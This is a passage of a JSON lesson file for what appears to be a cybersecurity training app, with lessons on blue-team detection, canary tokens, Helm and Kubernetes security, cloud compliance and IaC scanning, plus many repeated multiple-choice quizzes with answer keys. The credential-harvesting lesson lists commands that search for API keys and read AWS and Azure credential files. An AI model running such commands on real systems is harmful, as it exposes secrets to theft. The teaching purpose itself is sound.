structure:\n# 1. INJECT: 'Security alert: unusual outbound traffic to IP 185.x.x.x'\n# 2. Questions:\n#    - Who do you notify?\n#    - What logs do you check first?\n#    - How do you contain?\n# 3. INJECT: 'AV detects Cobalt Strike beacon on 3 workstations'\n# 4. Questions:\n#    - Isolate or monitor?\n#    - Check for lateral movement how?\n# 5. After-action review: what went well, what didn't?"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Tabletop exercises are...","opts":["Technical penetration tests","Discussion-based incident simulations","Automated scans","Compliance audits"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"AWS GuardDuty provides...","opts":["Firewall rules","Automated threat detection","Container orchestration","DNS hosting"],"ans":1},{"type":"quiz","q":"What is a sidecar container?","opts":["A backup container","A helper container running alongside the main app","A monitoring tool","A load balancer"],"ans":1},{"type":"quiz","q":"RBAC in Kubernetes controls...","opts":["Network traffic","Who can do what in the cluster","Container images","Storage volumes"],"ans":1},{"type":"quiz","q":"Cloud-native WAF examples include...","opts":["iptables","AWS WAF, Cloudflare, Azure Front Door","Snort","fail2ban"],"ans":1},{"type":"quiz","q":"Infrastructure drift means...","opts":["Moving to a new region","Actual infrastructure diverged from its defined state","Network latency","Container migration"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"canary-tokens","cat":"Defense & Blue Team","title":"Canary Tokens & Honey Files","diff":1,"xp":75,"intro":"Tripwires that alert you when an attacker accesses them.","sections":[{"type":"text","content":"A canary token is a trap: a URL, file, DNS name, or credential that has no legitimate use. Any access = an intruder."},{"type":"code","lang":"bash","content":"# Free canary tokens: canarytokens.org\n# Types:\n# - Word document that phones home when opened\n# - DNS token (unique hostname that alerts on resolution)\n# - AWS key that alerts when used\n# - URL that alerts on visit\n# DIY honey file:\necho 'admin:P@ssw0rd123!' > /shares/IT/credentials.txt\n# Monitor access with auditd:\nauditctl -w /shares/IT/credentials.txt -p r -k honeypot"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"A canary token is...","opts":["An encryption key","A decoy that alerts on access","A firewall rule","A user account"],"ans":1},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"helm-chart-security","cat":"Cloud & Container","title":"Helm Chart Security","diff":2,"xp":150,"intro":"Helm deploys K8s apps \u2014 a malicious chart owns your cluster.","sections":[{"type":"text","content":"Helm charts define K8s deployments. Untrusted charts can create privileged pods, mount host filesystems, or install backdoor services."},{"type":"code","lang":"yaml","content":"# Dangerous Helm values to audit:\n# 1. Privileged containers\nsecurityContext:\n  privileged: true   # RED FLAG\n# 2. Host path mounts\nvolumes:\n  - hostPath:\n      path: /        # RED FLAG: mounts host root\n# 3. Service account with cluster-admin\nserviceAccountName: cluster-admin\n# Scan Helm charts:\nhelm template mychart | kubesec scan -\ncheckov -d mychart/"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"A malicious Helm chart can...","opts":["Only affect the namespace","Compromise the entire cluster if it creates privileged pods","Nothing \u2014 Helm is safe","Only read data"],"ans":1},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloud-credential-harvesting","cat":"Cloud & Container","title":"Cloud Credential Harvesting","diff":2,"xp":150,"intro":"Find cloud credentials in code, configs, and metadata.","sections":[{"type":"text","content":"AWS keys in .env files, Azure tokens in browser storage, GCP service account keys in repos \u2014 cloud credentials leak everywhere."},{"type":"code","lang":"bash","content":"# Search GitHub for leaked keys\n# truffleHog\ntrufflehog git https://github.com/org/repo\n# Search local files\ngrep -rn 'AKIA' /var/www/  # AWS access keys start with AKIA\ngrep -rn 'sk-ant-' .        # Anthropic API keys\ngrep -rn 'ghp_' .            # GitHub PATs\n# AWS credential files\ncat ~/.aws/credentials\n# Azure CLI tokens\ncat ~/.azure/accessTokens.json"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"AWS access key IDs start with...","opts":["AWS-","KEY-","AKIA","IAM-"],"ans":2},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"service-mesh-security","cat":"Cloud & Container","title":"Service Mesh Security (Istio)","diff":2,"xp":150,"intro":"mTLS between services \u2014 encrypt all east-west traffic in the cluster.","sections":[{"type":"text","content":"A service mesh like Istio injects sidecar proxies that enforce mTLS, authorization policies, and observability between microservices."},{"type":"code","lang":"yaml","content":"# Istio: enforce mTLS for all services\napiVersion: security.istio.io/v1beta1\nkind: PeerAuthentication\nmetadata:\n  name: default\n  namespace: istio-system\nspec:\n  mtls:\n    mode: STRICT\n---\n# Authorization policy: only frontend can reach backend\napiVersion: security.istio.io/v1beta1\nkind: AuthorizationPolicy\nmetadata:\n  name: backend-policy\nspec:\n  selector:\n    matchLabels: {app: backend}\n  rules:\n  - from: [{source: {principals: [\"cluster.local/ns/default/sa/frontend\"]}}]"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"A service mesh provides...","opts":["Container orchestration","mTLS and authorization between microservices","DNS resolution","Load balancing only"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"DEP/NX prevents...","opts":["Buffer overflows","Executing code on the stack/heap","Network attacks","File access"],"ans":1},{"type":"quiz","q":"ASLR randomizes...","opts":["File names","Memory layout addresses","Passwords","Network ports"],"ans":1},{"type":"quiz","q":"A stack canary detects...","opts":["Memory leaks","Buffer overflow (stack smashing)","Race conditions","Format strings"],"ans":1},{"type":"quiz","q":"msfconsole is part of...","opts":["Nmap","Metasploit Framework","Burp Suite","Wireshark"],"ans":1},{"type":"quiz","q":"Staged vs stageless payloads differ in...","opts":["Size only","Staged downloads the payload in a second connection","Encryption","Protocol used"],"ans":1},{"type":"quiz","q":"A reverse shell connects...","opts":["Attacker to target","Target back to attacker","Both ways simultaneously","Through DNS only"],"ans":1},{"type":"quiz","q":"What is fuzzing?","opts":["Code review","Sending random/mutated input to find crashes","Network scanning","Password guessing"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"k8s-secrets-management","cat":"Cloud & Container","title":"Kubernetes Secrets Best Practices","diff":1,"xp":100,"intro":"K8s secrets are base64, not encrypted \u2014 handle them properly.","sections":[{"type":"text","content":"Default K8s secrets are just base64 encoded in etcd. Use external secret managers (Vault, AWS Secrets Manager) and enable etcd encryption at rest."},{"type":"code","lang":"bash","content":"# BAD: secrets visible in plain YAML\nkubectl get secret db-creds -o yaml\n# Decode (trivial)\necho 'cGFzc3dvcmQ=' | base64 -d  # 'password'\n# GOOD: use external secrets\n# external-secrets operator\napiVersion: external-secrets.io/v1beta1\nkind: ExternalSecret\nmetadata:\n  name: db-creds\nspec:\n  secretStoreRef: {name: aws-store, kind: SecretStore}\n  target: {name: db-creds}\n  data: [{secretKey: password, remoteRef: {key: prod/db/password}}]"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"Kubernetes secrets are stored in etcd as...","opts":["Encrypted by default","Base64 encoded (NOT encrypted)","Hashed","Compressed"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"Kubernetes pods are...","opts":["Physical servers","The smallest deployable unit (one or more containers)","Network switches","Storage volumes"],"ans":1},{"type":"quiz","q":"What port does the Kubernetes API server use?","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform is used for...","opts":["Container orchestration","Infrastructure as Code","Password management","Log analysis"],"ans":1},{"type":"quiz","q":"The principle of least privilege in cloud means...","opts":["Give admin access to everyone","Grant only the minimum permissions needed","Use the free tier","Disable all access"],"ans":1},{"type":"quiz","q":"A container escape means...","opts":["Stopping a container","Breaking out of a container to access the host","Deleting a container","Restarting a container"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"cloud-compliance","cat":"Cloud & Container","title":"Cloud Compliance Basics (SOC2/HIPAA/PCI)","diff":1,"xp":75,"intro":"Compliance frameworks that govern how you handle data in the cloud.","sections":[{"type":"text","content":"SOC2 (trust principles), HIPAA (healthcare data), PCI-DSS (payment cards), GDPR (EU personal data). Each requires specific controls."},{"type":"code","lang":"bash","content":"# Key compliance requirements:\n# SOC2: access controls, encryption, monitoring, incident response\n# HIPAA: PHI encryption, access logs, BAAs with cloud providers\n# PCI-DSS: network segmentation, no stored CVVs, quarterly scans\n# GDPR: consent, data minimization, right to deletion, breach notification\n\n# AWS compliance tools:\naws securityhub get-findings\naws config get-compliance-details-by-config-rule --config-rule-name s3-bucket-public-read"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"PCI-DSS governs...","opts":["Healthcare data","Payment card data","Personal data","Government data"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access Module","Identity and Access Management","Integrated Application Monitor","Internal Audit Mechanism"],"ans":1},{"type":"quiz","q":"S3 bucket names are...","opts":["Private by default","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"A security group in AWS acts as a...","opts":["User group","Virtual firewall for instances","Encryption key","Load balancer"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["Application errors","API calls made in the AWS account","Network traffic","Instance metrics"],"ans":1},{"type":"quiz","q":"Container images are built from...","opts":["VMware files","Dockerfiles","ISO images","AMIs"],"ans":1},{"type":"quiz","q":"IAM stands for...","opts":["Internet Access","Identity and Access Management","Integrated App","Internal Audit"],"ans":1},{"type":"quiz","q":"S3 names are...","opts":["Private","Globally unique","Encrypted always","Region-locked"],"ans":1},{"type":"quiz","q":"Security groups act as...","opts":["User groups","Virtual firewalls","Keys","Load balancers"],"ans":1},{"type":"quiz","q":"CloudTrail logs...","opts":["App errors","AWS API calls","Network traffic","Metrics"],"ans":1},{"type":"quiz","q":"Dockerfiles build...","opts":["VMs","Container images","ISO files","AMIs"],"ans":1},{"type":"quiz","q":"K8s pods are...","opts":["Servers","Smallest deployable unit","Switches","Volumes"],"ans":1},{"type":"quiz","q":"K8s API port is...","opts":["80","443","6443","8080"],"ans":2},{"type":"quiz","q":"Terraform does...","opts":["Orchestration","Infrastructure as Code","Passwords","Logs"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum permissions needed","Full admin","Read-only"],"ans":1},{"type":"quiz","q":"Container escape reaches...","opts":["Another container","The host system","Internet","Nothing"],"ans":1}]},{"id":"iac-scanning","cat":"Cloud & Container","title":"Infrastructure as Code Security Scanning","diff":1,"xp":100,"intro":"Catch cloud misconfigurations in your Terraform/CloudFormation before deploy.","sections":[{"type":"text","content":"Scan IaC templates for security issues: public buckets, open security groups, unencrypted databases, missing logging."},{"type":"code","lang":"bash","content":"# tfsec (Terraform)\ntfsec .\n# checkov (multi-framework)\ncheckov -d . --framework terraform\ncheckov -d . --framework cloudformation\n# terrascan\nterrascan scan -d .\n# Common findings:\n# - S3 bucket without encryption\n# - Security group allowing 0.0.0.0/0\n# - RDS without encryption at rest\n# - CloudTrail not enabled"},{"type":"text","content":"Cloud security is about identity. Unlike network perimeters, cloud is identity-perimeter: valid credentials = access from anywhere. IAM is more important than network security."},{"type":"tip","content":"Start with 'who am I and what can I do?' Most cloud breaches come from overprivileged IAM, not sophisticated exploits."},{"type":"task","content":"Create a free AWS account. Misconfigure it intentionally (public S3, overprivileged IAM, IMDSv1). Discover and exploit each, then fix them all."},{"type":"quiz","q":"IaC scanning catches issues...","opts":["After deployment","Before deployment (shift-left)","During runtime","In backups"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 